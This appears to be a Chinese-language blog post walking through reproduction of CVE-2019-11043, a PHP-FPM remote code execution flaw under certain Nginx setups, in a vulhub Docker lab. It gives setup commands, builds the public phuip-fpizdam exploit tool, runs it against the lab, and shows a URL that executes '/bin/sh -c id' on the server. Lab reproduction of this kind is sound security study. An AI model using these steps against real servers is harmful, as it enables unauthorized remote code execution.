search
LoginSignup
0
Help us understand the problem. What are the problem?

More than 3 years have passed since last update.

posted at

[漏洞复现]CVE-2019-11043/PHP-FPM在Nginx特定配置下远程代码执行

环境准备

可以使用vulhub的环境
先在本地创建一个名为CVE-2019-11043的文件夹,再创建一个名为www的文件夹
CVE-2019-11043文件夹下执行如下命令

wget https://raw.githubusercontent.com/vulhub/vulhub/master/php/CVE-2019-11043/default.conf
wget https://raw.githubusercontent.com/vulhub/vulhub/master/php/CVE-2019-11043/docker-compose.yml

CVE-2019-11043/www文件夹下执行如下命令

wget https://raw.githubusercontent.com/vulhub/vulhub/master/php/CVE-2019-11043/www/index.php

下载完成三个文件以后,在CVE-2019-11043文件夹下执行如下命令启动环境

service docker start
docker-compose up -d

随后访问http://ip:8080/index.php即可

工具准备

访问https://github.com/neex/phuip-fpizdam,clone到本地以后,执行如下命令(将根据OS自动生成对应的OS版本)

go build

image.png

即可生成phuip-fpizdam工具

漏洞复现

使用./phuip-fpizdam http://ip:8080/index.php攻击漏洞环境

image.png

随后访问http://ip:8080/index.php?a=/bin/sh+-c%20%27id%27&即可

image.png

Reference

https://github.com/neex/phuip-fpizdam
https://github.com/vulhub/vulhub/tree/master/php/CVE-2019-11043

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
What you can do with signing up
0
Help us understand the problem. What are the problem?